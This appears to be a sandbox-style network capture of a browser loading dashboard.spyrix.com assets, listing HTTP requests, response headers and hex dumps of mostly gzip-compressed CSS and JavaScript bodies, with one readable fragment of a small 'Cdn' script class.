2024-10-02 04:11:36 UTC	3691	IN	Data Raw: 35 36 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c4 bd 0d 73 db 46 96 f7 fb 55 24 96 56 4b 8e 61 c5 ca cc ce ce 80 86 59 8c 2c c7 9a d8 4e 1c db 8a 12 45 cb 50 24 24 d1 a6 08 86 20 25 33 92 9e cf 7e 7f ff d3 2f 00 29 79 36 cf ad ba 75 ab 6c 11 68 34 fa e5 f4 e9 f3 de 07 57 fd d9 c6 de 41 f6 fd e9 c7 7c 30 df 19 e6 67 a3 49 fe c3 ac 98 e6 b3 f9 b2 7d c5 c3 83 83 ac 99 27 dd 64 de ca 9e 75 37 46 93 8d bc b3 77 60 25 37 f9 64 71 99 cf fa a7 e3 3c dd 7c 92 0c 8a c9 d9 e8 7c 11 ef af 67 a3 79 78 76 d5 1f 2f f2 74 7e d7 4a f3 e3 ee 49 36 b7 96 7f 9c 54 2d 37 0f d4 e6 7c 39 cd 8b b3 8d ee 66 d6 28 97 97 a7 c5 b8 d1 e9 3e 6a 34 52 f5 ce bf 76 f3 6c 31 19 cc 47 c5 a4 d9 ba a1 bb 72 be d1 cd 86 c5 80 51 4c e6 3b 83 59 de 9f e7 fb e3 5c 77 cd c6 78 34 f9 d4 68 ed cc Data Ascii: 565fsFU$VKaY,NEP$$ %3~/)y6ulh4WA\|0gI}'du7Fw`%7dq<\|\|gyxv/t~JI6T-7\|9f(>j4Rvl1GrQL;Y\wx4h
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: f8 42 dc 19 97 b3 5c 57 c1 67 2a 95 2c 70 a6 ef a7 d2 7b cb f8 4c ba cd 66 50 6a fc bb 48 f1 e5 45 b1 18 0f 7f 64 59 f3 19 43 1a 8e 70 b4 4b bf 2a b1 46 dd e9 1d cf d9 77 2e 64 af 8d ae 99 66 63 58 5c a6 8e f0 b8 97 1b 70 96 04 cf 46 bd c1 e0 8c 74 23 c5 10 1e 1a f3 83 7c 4f 3f 92 6a c4 9a 86 d8 c7 6d 41 86 c9 68 98 e6 e3 6a 33 0f b5 42 ad 0e 8a ea b0 95 da 4d 52 ef c4 5c c2 ad b6 b6 e2 0c ec e9 31 30 9b eb 0c bd 27 bb c9 c7 af fb d3 f4 26 1a 0b 52 a2 0a bc 8b de fb e6 93 68 54 e0 99 ae ef 60 55 d1 d3 3e 94 17 cd a4 63 e8 d0 45 8e 3b fe 24 08 33 67 59 73 91 41 ae 4d a7 72 64 04 e1 7f 08 ff 5f 29 5a c0 59 f0 9a 23 aa d7 9a 9d 7a e7 dc d9 49 e0 d3 3d 64 c4 da a4 7b 0f a3 25 2e c6 d9 8e cd e9 78 ba 8a 62 4e 78 ba 40 35 85 9a 00 2b 07 6a 10 7e da 6a 9d 64 53 Data Ascii: B\Wg,p{LfPjHEdYCpKFw.dfcX\pFt#\|O?jmAhj3BMR\10'&RhT`U>cE;$3gYsAMrd_)ZY#zI=d{%.xbNx@5+j~jdS
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: d8 de 20 2a 4c d9 e9 91 a3 9b 2b 53 3a cd 17 96 c2 4f 1c 4e 22 1d aa cc 98 ff a4 d5 b9 e0 18 43 2b a5 45 fc 67 b4 58 d6 44 07 b3 7e 96 2d 97 d2 82 d3 3b 21 f2 bc 6b 6a 9f fa 37 10 7a 0b 33 e1 af 94 18 09 8a 25 c1 74 df 03 99 db cd ce e6 f1 ff 34 4f fe f2 6b 4b f8 7c 4e 51 da 3c fe 9f 93 47 ad af 92 a9 90 fd ab 5f ff c2 ed 5f 3a bf fe e5 d7 af be 3a af 66 cb 08 57 dd b5 9e ad 55 9b 69 ca 46 60 17 38 fe d8 5b 56 9e 0c 19 e2 18 54 ed b4 0f 71 fa 76 30 e1 7c 49 74 be b7 de 3f 83 c5 c8 5f 01 81 f2 f1 9e 27 d9 e4 78 37 dc 20 2d 22 93 56 ec fa 47 01 fd 46 40 ee 12 d0 af 49 3b 30 40 a5 5d 74 11 25 6e 61 fe cc 62 a8 35 d6 83 d1 68 10 8f b2 c9 23 9d 99 88 8a b5 83 a7 1a f2 d2 81 2c d2 b9 6d 2b 57 7f 6e f5 03 e2 62 bf b0 03 16 d5 68 2f 0d 7a 0c 69 33 0f cb 22 89 42 Data Ascii: *L+S:ON"C+EgXD~-;!kj7z3%t4OkK\|NQ<G__::fWUiF`8[VTqv0\|It?_'x7 -"VGF@I;0@]t%nab5h#,m+Wnbh/zi3"B
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: d5 dd b0 71 de de 5a 67 55 df c8 3b 34 e7 e0 83 f4 15 c6 29 85 c8 63 60 b7 43 1d e4 ce 9a 6d e9 97 fa 94 af 19 10 1f 46 41 4c 11 ee 35 44 64 b0 43 b9 16 f7 2c 56 d5 96 b3 63 68 c6 09 8b 2d 53 db 5c 99 a1 48 5a 4b c7 98 f7 34 1c e7 d3 40 75 8f 32 34 13 91 e3 40 f2 a9 7e 9d ab a2 8e c4 5d 5e 14 a5 5a 55 0f 24 42 52 5d d1 42 58 90 c9 33 12 b7 0e 16 89 2f 80 11 1a c4 ca 8b 54 c6 ca 7f 54 75 37 ce 18 8a 31 a1 f8 74 50 c7 73 f7 b8 fe b2 95 54 82 88 75 0c e9 13 aa fd 22 3c 93 a1 d7 a2 2e 7e 59 ba 75 08 51 17 12 10 25 5a f8 a8 12 bf bc c1 d1 26 28 38 1b 82 f3 79 05 a2 7b 16 fd 93 52 fc 0e c5 60 10 f2 ba a9 2d a2 af 6a 6c c7 4a f7 14 a6 64 c1 14 56 56 89 35 2c 84 89 35 f5 37 ee 40 ff 0d 57 af c6 13 ee 0f f1 f6 16 24 ed a2 76 81 6b e8 50 dd 5a ff a6 d5 b8 37 c2 e8 Data Ascii: qZgU;4)c`CmFAL5DdC,Vch-S\HZK4@u24@~]^ZU$BR]BX3/TTu71tPsTu"<.~YuQ%Z&(8y{R`-jlJdVV5,57@W$vkPZ7
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: 96 e1 54 67 6f 44 81 74 f8 4b 9c 69 8c 17 e3 1f f8 37 90 9d 80 15 e8 09 2d d4 51 af ba c1 6f 4f 26 72 37 44 f2 b2 8e 4a 9f 5f 4d b9 4d 47 e5 ab bc 7f c5 d7 f7 dc 8d e7 81 fe 9e 20 4b 3d 3a 7c 83 6d ae 34 bf 29 a1 69 51 e5 be 9e 5b e0 00 79 d8 63 8b 90 47 c0 7f 3a ab 1e 54 0d ba 67 21 dc e2 05 4e 93 17 3e 01 96 fb 78 f6 49 72 c0 d9 11 59 fe 7c e6 94 44 1f cf 22 ca d3 a7 03 e6 18 ca ac 54 c6 fa 61 2c 29 26 2e 35 dc 3e 38 30 4b 5f 28 7f 5c ed b2 7b 46 69 ed de 2e f7 b4 f6 9c 5b 1c ba ea ee 7d 81 20 77 05 b5 4b 7b bf 76 6f 97 0f be df 75 03 b5 01 ac 5c 6b 04 2b 05 56 b1 de c6 5d f2 cd 69 76 83 36 c2 67 a0 be 21 f8 0f 51 ce 6b 3f 9c bb 91 7a 92 1e ec 3b e3 01 a4 e7 c6 e9 e6 dd 98 ce 97 6c 46 d8 f7 91 b5 b4 c2 46 78 cb 3a c9 73 4b 2e f2 eb e3 0a a0 72 38 6f c3 Data Ascii: TgoDtKi7-QoO&r7DJ_MMG K=:\|m4)iQ[ycG:Tg!N>xIrY\|D"Ta,)&.5>80K_(\{Fi.[} wK{vou\k+V]iv6g!Qk?z;lFFx:sK.r8o
2024-10-02 04:11:36 UTC	2044	IN	Data Raw: 08 9f f4 8a 13 2d 32 32 c6 7c 72 f5 0d 79 b0 a1 ad 75 1a d3 c4 d3 e9 8c 6e 92 eb 5c e7 c5 e9 b7 13 3b 04 29 53 2b d3 be b4 72 7e 1d ff e6 d4 3f e9 14 e7 c9 21 c1 7f 61 b8 ae 2a 9b c0 aa f2 eb ab 5a c5 49 37 fb a1 69 29 36 ae 8d 78 a5 87 b2 9b 7b f9 69 6d 97 4e 92 4f 98 32 51 a2 48 71 29 43 38 5a 2e 00 82 9a 2f e2 3d 03 71 71 76 18 b8 2c e2 96 ee d2 23 04 8c 89 2f c8 8e 68 df f2 ab af cf bc df 7a be 4f 7e 75 a6 4c 80 44 f2 c9 f8 4f fc 2c f1 27 01 61 dc e2 23 f0 2e c5 a4 3e 46 1c 68 49 48 eb fa a9 fa f6 1a c0 7b 46 fc 09 60 4b 3e 1d 97 24 f9 a6 4f 4e 7d b1 cb 16 da 58 2b 46 80 fd bc f9 09 04 6b dd b0 f9 3d 98 59 13 a5 b3 6b 02 fb 67 9f f8 1b 00 86 7c 5a b2 59 3f 51 2f 16 69 2e 34 f1 fd 7e 42 74 25 17 d7 73 82 0d 74 71 70 8a 51 58 17 a5 0c df ba 38 dd 57 d8 Data Ascii: -22\|ryun\;)S+r~?!a*ZI7i)6x{imNO2QHq)C8Z./=qqv,#/hzO~uLDO,'a#.>FhIH{F`K>$ON}X+Fk=Ykg\|ZY?Q/i.4~Bt%stqpQX8W
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: 35 38 30 30 0d 0a 9d 31 fc 42 2b 3e 7f c1 4d 6d b1 21 39 ae 03 cd 60 51 5b fa a1 d0 b6 df 6a 6e b2 8b 36 19 5d 17 a2 47 65 3e 83 48 0e 1b be 33 c8 56 c5 68 e2 9e 90 0f 48 cf c6 3a dd 8c 27 7c 28 af 93 c3 0a ce 07 92 c4 29 de aa 56 c9 f3 30 ec 61 70 eb 2b 0e 05 89 cc 87 7a a9 8a 19 b3 88 d6 cb fa 35 ab 97 0d 6a b6 3a 28 b5 e9 df 9b f1 9e 83 d7 1d 2c cf 7d 23 04 73 0c 99 f5 b7 0c cb 1a 35 59 d9 c3 c0 12 41 b2 34 25 e6 9a 84 ac f9 0f e0 8d 9d f4 b0 f3 4c 5d 1b 8a 20 35 16 74 a0 74 ac dc 1c 9d f1 de ea 0e 58 dd b1 33 97 2c da 10 01 00 58 12 e6 ca c2 51 b7 e3 8f 63 45 7e b9 68 75 04 a6 6c c0 87 1e d9 55 ca 22 40 46 10 2b b8 8f 4a 63 71 74 0e b5 6b 04 92 69 06 c0 68 42 67 82 83 7e e1 43 0a b7 35 8b 61 34 8d 8e ed 23 30 0a 29 a5 03 72 7c 49 4e b5 15 47 8c 5a 3c Data Ascii: 58001B+>Mm!9`Q[jn6]Ge>H3VhH:'\|()V0ap+z5j:(,}#s5YA4%L] 5ttX3,XQcE~hulU"@F+JcqtkihBg~C5a4#0)r\|INGZ<
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: 5d 1d 9f 91 a7 a6 4b 6a 45 ac 48 ba 36 fd d3 5d b1 27 97 2a 12 45 de 77 d2 65 0d d2 77 47 cf 5e 90 4b 9f 71 ab 10 ac c7 a8 7a 48 8a cb 15 89 40 d2 1c a5 77 3a 5d f6 85 19 8a 42 1e 31 3a 37 33 09 77 6e 3a a6 5b 4a f9 74 b7 18 d7 99 c4 0b be 6b 27 61 16 65 5a c6 07 fe 32 c1 b0 d9 99 8e 14 67 78 07 d3 42 a7 0e b3 f2 4a b5 ca 8c a2 22 c0 33 23 38 4c eb d2 5d 3c 30 3b c7 64 9d b9 15 6d dd 3e 01 f8 e5 4e 0f 7d a7 ff 06 96 e0 e2 ff 6d bf 87 7c de f0 2c 7f fc 58 b4 ef e8 19 56 28 fd 6a c6 b5 09 b3 9c bb 9a f0 79 fe f4 45 e7 ea f8 3c 3f 81 8f a5 78 1b 3c 90 04 1e 6f 47 f8 22 4c 98 be 68 6a b4 5d 40 8b 98 b1 f3 d2 59 d7 f4 18 da 3b 6c b7 64 67 17 98 dd b2 5b e5 ba 5f 88 55 38 d2 88 d0 0f ba 46 f0 c8 a9 6d c3 39 42 2c 10 08 19 52 cd fe b1 37 ff 37 8b b5 67 49 2b 82 Data Ascii: ]KjEH6]'*EwewG^KqzH@w:]B1:73wn:[Jtk'aeZ2gxBJ"3#8L]<0;dm>N}m\|,XV(jyE<?x<oG"Lhj]@Y;ldg[_U8Fm9B,R77gI+
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: 4c 86 17 1a 61 32 26 06 dd fb fb df e2 5e 49 7d 1a d3 65 90 81 84 dc ac 56 34 83 3f 5e 34 c3 c6 34 47 f7 4e 6a cc ec 09 bc 61 40 43 ae 30 59 40 d7 82 ae 44 3d 76 b6 54 07 e3 4e d3 f1 a2 45 de 2b 44 9d 6a 3d 14 00 84 06 42 6f 38 a8 2a ff 21 6c 41 cf dc 7c 44 8e c3 4e 49 c4 b4 fe 7c 43 00 69 5a b6 cf e5 a3 87 df fc 95 d5 b6 69 81 af e9 90 2a 18 29 18 ba 4d ee 34 a7 ea 88 0e e8 5e e9 22 d6 25 85 f5 19 cb c0 46 b8 ff a3 bf 03 5f 87 80 35 d8 8c 6d 2e ff 81 1a 24 c9 31 c0 63 86 4f 3e e7 0a 68 70 2f d1 f9 99 54 f4 e5 3c 89 41 2c 45 47 ad 4c 26 12 8c 9c 16 59 4c fe 58 cb af 15 08 b1 0f 48 a1 46 e9 00 0c 22 a0 15 0e 51 a7 7e 87 e1 79 11 9e e2 cb 90 f6 d6 ba f1 f8 08 ba 49 d4 8f 57 ec 37 af d8 df 10 8e bc a6 0f f7 a4 13 0f 03 54 46 d9 39 e5 7d ac 3c cc 16 0c 8c 82 Data Ascii: La2&^I}eV4?^44GNja@C0Y@D=vTNE+Dj=Bo8!lA\|DNI\|CiZi)M4^"%F_5m.$1cO>hp/T<A,EGL&YLXHF"Q~yIW7TF9}<
2024-10-02 04:11:36 UTC	4096	IN	Data Raw: ba 65 1d 7f de 83 57 b1 0b 16 31 2e 40 be e8 e2 4f b5 5f b4 b5 66 5a f3 69 73 c7 97 e1 82 65 38 d7 4a b2 0e a0 9d e6 0e 63 e7 12 06 29 0e 37 41 82 66 f7 9e 7e 34 78 5a 1e d8 2c d5 6c 09 62 52 3b 66 45 bb dd d4 ce c0 b2 d6 1d 53 b1 36 2f bc 0d 5b 91 14 38 9c 06 58 61 18 ae e0 c3 15 b1 8b 74 e6 e2 cf 51 b4 33 68 47 39 87 97 56 3a 46 87 83 fc 50 fa 6d e7 6d fd c3 56 42 69 ba 1b 45 2a b4 51 f0 b1 d5 a7 ec 59 64 02 8e 2e 69 58 3d 63 c5 8c f3 83 ad 99 8e 86 8b 26 8a 96 fb 0f aa 22 e8 42 c5 22 d4 c6 46 49 bc b1 32 89 30 02 05 83 90 0e 2c 88 21 8b 9e 19 58 de 51 20 7e dd 9a e4 f6 44 76 e7 4b df 50 9d e9 fa 37 5c 40 42 44 89 e1 3f fa 12 ca 69 02 9b a4 5b 5a e0 c6 85 a4 20 0b 04 4c ed 1c ef e5 6a 14 a1 42 52 36 43 40 c6 8c 62 a8 68 e7 8b 76 e4 01 9e ce a0 dd 7e 98 Data Ascii: eW1.@O_fZise8Jc)7Af~4xZ,lbR;fES6/[8XatQ3hG9V:FPmmVBiE*QYd.iX=c&"B"FI20,!XQ ~DvKP7\@BD?i[Z LjBR6C@bhv~

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:36 UTC	574	OUT	GET /dashboard30/assets/index-93c74fef.css HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://dashboard.spyrix.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:37 UTC	314	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:11:36 GMT Content-Type: text/css Transfer-Encoding: chunked Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: W/"66fa817d-ef8c" Content-Encoding: gzip Cache: STALE X-Cached-Since: 2024-10-01T21:34:51+00:00 X-Node: m9-up-gc97
2024-10-02 04:11:37 UTC	3782	IN	Data Raw: 33 39 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 7b 73 23 b9 91 e7 ff f7 29 b8 d3 e1 08 c9 a7 62 f3 fd 52 ec 86 e7 e1 59 af 6f ed f5 7b 6f ec 98 53 14 ab 8a 22 2d 8a d4 90 54 4b 3d 3a dd 67 bf 5f 26 32 f1 28 a0 48 aa a7 1d 77 17 71 d3 ee b6 54 85 4a 24 f2 8d 44 02 f8 45 b1 cc 77 fb ea d0 fa e2 cf 7f fa 36 9b 7c 71 fd 8b c5 76 73 c8 16 79 51 bd c8 4f f7 ab f5 c7 d9 6f 1f 37 ab c3 f6 7a bf 2b 66 8f bb f5 c5 f2 70 78 d8 cf de bf 2f ca 4d 1b 7f cb ed d3 66 bd cd cb f6 a6 3a bc 2f f3 fd 72 be cd 77 65 bf f3 3e df 03 f6 fe bd f9 3a fb 43 75 fb b8 ce 77 d9 b8 5f 16 79 3e ec b6 9f b6 8b 45 ef 92 a1 ae b7 45 be be f8 e2 77 db 87 87 d5 66 ff c5 e5 d5 67 ef a6 b5 d8 ee ee f3 c3 c5 17 d4 eb 17 97 d7 3c bc a7 6a 75 bb 3c cc fa 9d 4e 6b d8 e9 98 67 fb c3 c7 75 35 Data Ascii: 39b9}{s#)bRYo{oS"-TK=:g_&2(HwqTJ$DEw6\|qvsyQOo7z+fpx/Mf:/rwe>:Cuw_y>EEwfg<ju<Nkgu5
2024-10-02 04:11:37 UTC	4096	IN	Data Raw: 71 4f f3 2c fb bd c1 c8 36 c0 06 0f c4 3b 2b d4 7a 97 b2 dc 64 68 a9 f3 cd 4b 2d d5 62 24 d8 25 6a d9 5a 7b f0 9a bf 98 95 23 f3 8d a4 33 2e af d9 5a 97 48 45 23 25 4f 7b 9c b0 87 09 09 7f 14 c4 b5 68 75 8f 23 b2 2e f6 f8 4c a7 d8 e9 d3 c7 56 1f bf c8 b1 dd df bf e6 a6 32 3a 05 dc 4c 98 a2 2e 64 51 fc 5d de 9b ce 17 d5 eb b2 7b b5 ec 5d 2d fb 57 cb c1 d5 72 f8 82 75 ac 5b 84 d2 d8 fd 20 6b 66 1d b4 60 fe cd 3c c9 59 22 b4 f4 19 e4 bd f2 e2 0b 5d 95 ab 91 e9 75 d9 8b 01 22 d8 fc 64 80 ae 92 ce 96 25 ba 62 44 66 86 56 06 4a d9 ea eb b2 1f 63 80 29 ce 27 63 f0 ba 1c c4 00 31 21 3a 0e 50 63 ad 26 3a 99 50 ff 45 f2 85 54 74 e8 ed 24 33 a5 cb c5 e3 6e 8f 95 1c 29 0e 76 4c 43 35 a6 f0 11 8b ae 24 4e a6 d6 97 33 e0 02 90 e4 60 9d 3f 60 69 44 7f 90 95 53 69 5a 5e Data Ascii: qO,6;+zdhK-b$%jZ{#3.ZHE#%O{hu#.LV2:L.dQ]{]-Wru[ kf`<Y"]u"d%bDfVJc)'c1!:Pc&:PETt$3n)vLC5$N3`?`iDSiZ^
2024-10-02 04:11:37 UTC	4096	IN	Data Raw: 27 a8 f8 21 15 42 3b 6c 79 3d 4f bf 00 b3 ce 91 84 ed b3 69 0b 44 fa 7c 22 91 65 53 43 5f 0d 03 34 35 60 be 7e 28 25 15 e0 4c f3 4c 6d 79 d3 34 0c c6 32 c2 3d a0 49 df 89 d3 69 b0 69 8c 3d fe 7e 7a 5f ed 5a 82 cb 89 9f 07 3e 14 1f ef c2 54 be 28 d5 dc 9f 5a 7d 65 ce f0 55 00 72 6f a6 bd 46 b5 95 13 e3 37 a8 1e 8c b9 1a 50 86 4e 10 d6 64 97 24 d7 62 06 34 7b a7 17 9f 83 6a df 9d ff 21 e8 0d d6 da f3 ba dc ea 0c d9 8b 11 7b 63 84 3f ef d7 c2 22 2f e8 3b 17 78 5a 3a 22 91 90 00 77 80 b2 57 ba 6d d7 06 62 a7 7b 6c 96 91 a6 4e 8e 8a c8 bf 52 f5 47 76 86 9c 34 e2 79 5a 3e cc 3c a6 49 b6 3f 3f c5 da ab 4d b8 98 a7 c3 fb de 2e 9c b4 c7 8a 36 a7 cb 13 77 d2 d1 2a 0d 4e 88 c8 1b cd e3 bb 45 51 74 c7 28 a1 72 37 ef 06 ca 17 52 f6 a5 f3 b3 26 b3 6d 8f 3d bc 7c c5 46 Data Ascii: '!B;ly=OiD\|"eSC_45`~(%LLmy42=Iii=~z_Z>T(Z}eUroF7PNd$b4{j!{c?"/;xZ:"wWmb{lNRGv4yZ><I??M.6w*NEQt(r7R&m=\|F
2024-10-02 04:11:37 UTC	2811	IN	Data Raw: 52 64 24 61 1c cd 1e 2b 75 94 6b 4c ea 9e 1a d2 71 9f 18 8c e7 df 69 b9 35 48 01 99 8c b0 57 c9 40 6a 32 eb b6 ba a4 f6 d6 64 20 ae 20 d0 94 d0 3d 2c b3 60 c7 a2 1b 5e a0 6d be a9 56 a3 a2 fb 5a 94 78 67 00 ad 95 99 e6 87 c3 ee 82 73 8d 07 5c 08 bc 4e 69 54 4c 55 93 bb e6 62 0c 92 b9 ac cb f5 8f 56 b4 6a b3 1e 9d 01 b8 1c ac 9a 19 0a 48 89 6f b1 f5 f3 93 4a 1e b1 79 66 41 d9 43 8f bc 9c 1b e0 d9 1e 57 f7 d9 4d 60 4a 0b be 0d a3 44 ba 68 f3 18 49 a5 10 43 e9 6c ea 80 49 05 68 6b 9d 9b 1b 2f a6 9d c9 b4 37 3c 23 5d e2 6c a9 31 63 0d 70 ec c9 49 d2 de d3 0a 13 30 ba 6b f0 1c 36 ad 36 2e ce 33 d7 07 1c 40 6b 1d 8c 43 8e 5d b0 49 06 b0 1a c3 74 5c aa a9 ab f5 e0 63 57 cb 26 39 78 4a 16 0e cf 12 e2 17 ae e3 9d 03 d2 18 91 2b b6 b9 86 34 d2 79 3b b4 82 0e 07 67 Data Ascii: Rd$a+ukLqi5HW@j2d =,`^mVZxgs\NiTLUbVjHoJyfACWM`JDhIClIhk/7<#]l1cpI0k66.3@kC]It\cW&9xJ+4y;g
2024-10-02 04:11:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:37 UTC	531	OUT	GET /cdn.js HTTP/1.1 Host: dashboard.spyrix.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://dashboard.spyrix.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:37 UTC	344	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:11:37 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 987 Last-Modified: Mon, 30 Sep 2024 10:46:14 GMT Connection: close ETag: "66fa8176-3db" X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; X-State: 3.0 Accept-Ranges: bytes
2024-10-02 04:11:37 UTC	987	IN	Data Raw: 0a 63 6c 61 73 73 20 43 64 6e 20 7b 0a 20 20 5f 6d 61 78 43 6f 75 6e 74 65 72 20 3d 20 33 30 3b 0a 20 20 5f 69 6e 74 65 72 76 61 6c 20 3d 20 6e 75 6c 6c 3b 0a 20 20 5f 63 6f 75 6e 74 65 72 20 3d 20 30 3b 0a 0a 20 20 69 6e 69 74 28 29 20 7b 0a 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 27 63 64 6e 2d 6f 66 66 3d 30 27 3b 20 2f 2f d0 bf d0 be d1 82 d0 be d0 bc d1 83 20 d1 87 d1 82 d0 be 20 d0 ba d1 83 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b1 d0 b8 d0 b2 d0 b0 d0 bb d0 b0 d1 81 d1 8c 20 d0 b8 20 d0 bd d0 b5 20 d0 bf d0 b5 d1 80 d0 b5 d0 b2 d0 be d0 b4 d0 b8 d0 bb d0 be 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 0a 20 20 20 20 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 20 3d 20 73 65 74 49 6e 74 65 72 76 61 6c 28 Data Ascii: class Cdn { _maxCounter = 30; _interval = null; _counter = 0; init() { // document.cookie = 'cdn-off=0'; // this._interval = setInterval(

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:38 UTC	379	OUT	GET /dashboard30/assets/index-004f4025.js HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:38 UTC	346	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:11:38 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: W/"66fa817d-135fd2" Content-Encoding: gzip Cache: STALE X-Cached-Since: 2024-10-02T02:04:41+00:00 X-Node: m9p-up-gc30
2024-10-02 04:11:38 UTC	3750	IN	Data Raw: 35 36 39 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c4 bd 0d 73 db 46 96 f7 fb 55 24 96 56 4b 8e 61 c5 ca cc ce ce 80 86 59 8c 2c c7 9a d8 4e 1c db 8a 12 45 cb 50 24 24 d1 a6 08 86 20 25 33 92 9e cf 7e 7f ff d3 2f 00 29 79 36 cf ad ba 75 ab 6c 11 68 34 fa e5 f4 e9 f3 de 07 57 fd d9 c6 de 41 f6 fd e9 c7 7c 30 df 19 e6 67 a3 49 fe c3 ac 98 e6 b3 f9 b2 7d c5 c3 83 83 ac 99 27 dd 64 de ca 9e 75 37 46 93 8d bc b3 77 60 25 37 f9 64 71 99 cf fa a7 e3 3c dd 7c 92 0c 8a c9 d9 e8 7c 11 ef af 67 a3 79 78 76 d5 1f 2f f2 74 7e d7 4a f3 e3 ee 49 36 b7 96 7f 9c 54 2d 37 0f d4 e6 7c 39 cd 8b b3 8d ee 66 d6 28 97 97 a7 c5 b8 d1 e9 3e 6a 34 52 f5 ce bf 76 f3 6c 31 19 cc 47 c5 a4 d9 ba a1 bb 72 be d1 cd 86 c5 80 51 4c e6 3b 83 59 de 9f e7 fb e3 5c 77 cd c6 78 34 f9 d4 68 ed cc Data Ascii: 569asFU$VKaY,NEP$$ %3~/)y6ulh4WA\|0gI}'du7Fw`%7dq<\|\|gyxv/t~JI6T-7\|9f(>j4Rvl1GrQL;Y\wx4h
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: af 8d ae 99 66 63 58 5c a6 8e f0 b8 97 1b 70 96 04 cf 46 bd c1 e0 8c 74 23 c5 10 1e 1a f3 83 7c 4f 3f 92 6a c4 9a 86 d8 c7 6d 41 86 c9 68 98 e6 e3 6a 33 0f b5 42 ad 0e 8a ea b0 95 da 4d 52 ef c4 5c c2 ad b6 b6 e2 0c ec e9 31 30 9b eb 0c bd 27 bb c9 c7 af fb d3 f4 26 1a 0b 52 a2 0a bc 8b de fb e6 93 68 54 e0 99 ae ef 60 55 d1 d3 3e 94 17 cd a4 63 e8 d0 45 8e 3b fe 24 08 33 67 59 73 91 41 ae 4d a7 72 64 04 e1 7f 08 ff 5f 29 5a c0 59 f0 9a 23 aa d7 9a 9d 7a e7 dc d9 49 e0 d3 3d 64 c4 da a4 7b 0f a3 25 2e c6 d9 8e cd e9 78 ba 8a 62 4e 78 ba 40 35 85 9a 00 2b 07 6a 10 7e da 6a 9d 64 53 e4 9f 9d 29 ab 8c 71 e0 dd 68 98 ef 9f 9d c1 94 f0 f8 81 b1 b3 9d b2 2a b9 bd c5 c0 99 ac 14 c9 b1 1e e5 e2 a2 39 4c ce 92 69 80 41 4f 2e aa a1 34 d0 b3 bb df da 2b af 1d f7 e8 Data Ascii: fcX\pFt#\|O?jmAhj3BMR\10'&RhT`U>cE;$3gYsAMrd_)ZY#zI=d{%.xbNx@5+j~jdS)qh*9LiAO.4+
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: 10 7a 0b 33 e1 af 94 18 09 8a 25 c1 74 df 03 99 db cd ce e6 f1 ff 34 4f fe f2 6b 4b f8 7c 4e 51 da 3c fe 9f 93 47 ad af 92 a9 90 fd ab 5f ff c2 ed 5f 3a bf fe e5 d7 af be 3a af 66 cb 08 57 dd b5 9e ad 55 9b 69 ca 46 60 17 38 fe d8 5b 56 9e 0c 19 e2 18 54 ed b4 0f 71 fa 76 30 e1 7c 49 74 be b7 de 3f 83 c5 c8 5f 01 81 f2 f1 9e 27 d9 e4 78 37 dc 20 2d 22 93 56 ec fa 47 01 fd 46 40 ee 12 d0 af 49 3b 30 40 a5 5d 74 11 25 6e 61 fe cc 62 a8 35 d6 83 d1 68 10 8f b2 c9 23 9d 99 88 8a b5 83 a7 1a f2 d2 81 2c d2 b9 6d 2b 57 7f 6e f5 03 e2 62 bf b0 03 16 d5 68 2f 0d 7a 0c 69 33 0f cb 22 89 42 48 7d 63 d1 54 38 5c cc b6 